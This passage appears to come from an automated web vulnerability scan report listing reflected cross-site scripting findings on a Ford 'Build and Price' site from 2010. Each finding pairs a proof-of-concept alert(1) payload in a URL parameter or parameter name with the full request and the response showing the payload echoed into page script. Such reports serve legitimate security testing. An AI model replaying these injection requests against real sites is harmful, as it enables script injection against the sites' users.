Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fusion/ChooseYourPath/?branding=18b1a1'-alert(1)-'73c8afdffbd&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'18b1a1'-alert(1)-'73c8afdffbd',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Fusion',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.249. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fusion/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30947'-alert(1)-'4821abac2f4 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fusion/ChooseYourPath/?branding=1&referringSite=1&lang=en30947'-alert(1)-'4821abac2f4 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:56:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en30947'-alert(1)-'4821abac2f4',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Fusion',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.250. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fusion/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89ca3'-alert(1)-'ec106eea90d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fusion/ChooseYourPath/?89ca3'-alert(1)-'ec106eea90d=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'89ca3'-alert(1)-'ec106eea90d':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Fusion',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.251. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fusion/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 607a3'-alert(1)-'fce585a17f1 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fusion/ChooseYourPath/?branding=1&referringSite=1607a3'-alert(1)-'fce585a17f1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1607a3'-alert(1)-'fce585a17f1',
'Skin':'Generic',
'Model':'Fusion',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.252. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Mustang/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f65'-alert(1)-'70f23b9cebc was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Mustang/ChooseYourPath/?branding=188f65'-alert(1)-'70f23b9cebc&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'188f65'-alert(1)-'70f23b9cebc',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Mustang',
'Model':'Mustang',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.253. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Mustang/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d8a'-alert(1)-'e0f945c388a was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Mustang/ChooseYourPath/?branding=1&referringSite=1&lang=en50d8a'-alert(1)-'e0f945c388a HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en50d8a'-alert(1)-'e0f945c388a',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Mustang',
'Model':'Mustang',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true
...[SNIP]...

2.254. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Mustang/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa4d6'-alert(1)-'09aa06d344a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Mustang/ChooseYourPath/?fa4d6'-alert(1)-'09aa06d344a=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Mustang',
'Model':'Mustang',
'Year':'2011',
'fa4d6'-alert(1)-'09aa06d344a':'1'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.255. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Mustang/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5748f'-alert(1)-'d1793d7d4ca was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Mustang/ChooseYourPath/?branding=1&referringSite=15748f'-alert(1)-'d1793d7d4ca&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'15748f'-alert(1)-'d1793d7d4ca',
'Skin':'Mustang',
'Model':'Mustang',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.256. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Ranger/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ea1'-alert(1)-'6b7a0e83a2c was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Ranger/ChooseYourPath/?branding=153ea1'-alert(1)-'6b7a0e83a2c&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'153ea1'-alert(1)-'6b7a0e83a2c',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'Ranger',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.257. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Ranger/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 972c6'-alert(1)-'7ff0ea94904 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Ranger/ChooseYourPath/?branding=1&referringSite=1&lang=en972c6'-alert(1)-'7ff0ea94904 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en972c6'-alert(1)-'7ff0ea94904',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'Ranger',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.258. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Ranger/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7747f'-alert(1)-'9baeca58c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Ranger/ChooseYourPath/?7747f'-alert(1)-'9baeca58c87=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121833

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'7747f'-alert(1)-'9baeca58c87':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Trucks',
'Model':'Ranger',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.259. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Ranger/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fb0'-alert(1)-'bb3a25543c6 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Ranger/ChooseYourPath/?branding=1&referringSite=198fb0'-alert(1)-'bb3a25543c6&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'198fb0'-alert(1)-'bb3a25543c6',
'Skin':'Trucks',
'Model':'Ranger',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.260. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-SuperDuty/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 644cf'-alert(1)-'5b2f7ccf7ee was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-SuperDuty/ChooseYourPath/?branding=1644cf'-alert(1)-'5b2f7ccf7ee&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1644cf'-alert(1)-'5b2f7ccf7ee',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'SuperDuty',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.261. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-SuperDuty/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee0c'-alert(1)-'12a1c0a5220 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-SuperDuty/ChooseYourPath/?branding=1&referringSite=1&lang=endee0c'-alert(1)-'12a1c0a5220 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 04:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'endee0c'-alert(1)-'12a1c0a5220',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'SuperDuty',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = tru
...[SNIP]...

2.262. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-SuperDuty/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76bc0'-alert(1)-'3f5212b8f7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-SuperDuty/ChooseYourPath/?76bc0'-alert(1)-'3f5212b8f7f=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121836

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'76bc0'-alert(1)-'3f5212b8f7f':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Trucks',
'Model':'SuperDuty',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.263. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-SuperDuty/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d673b'-alert(1)-'d928b3e9a59 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-SuperDuty/ChooseYourPath/?branding=1&referringSite=1d673b'-alert(1)-'d928b3e9a59&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
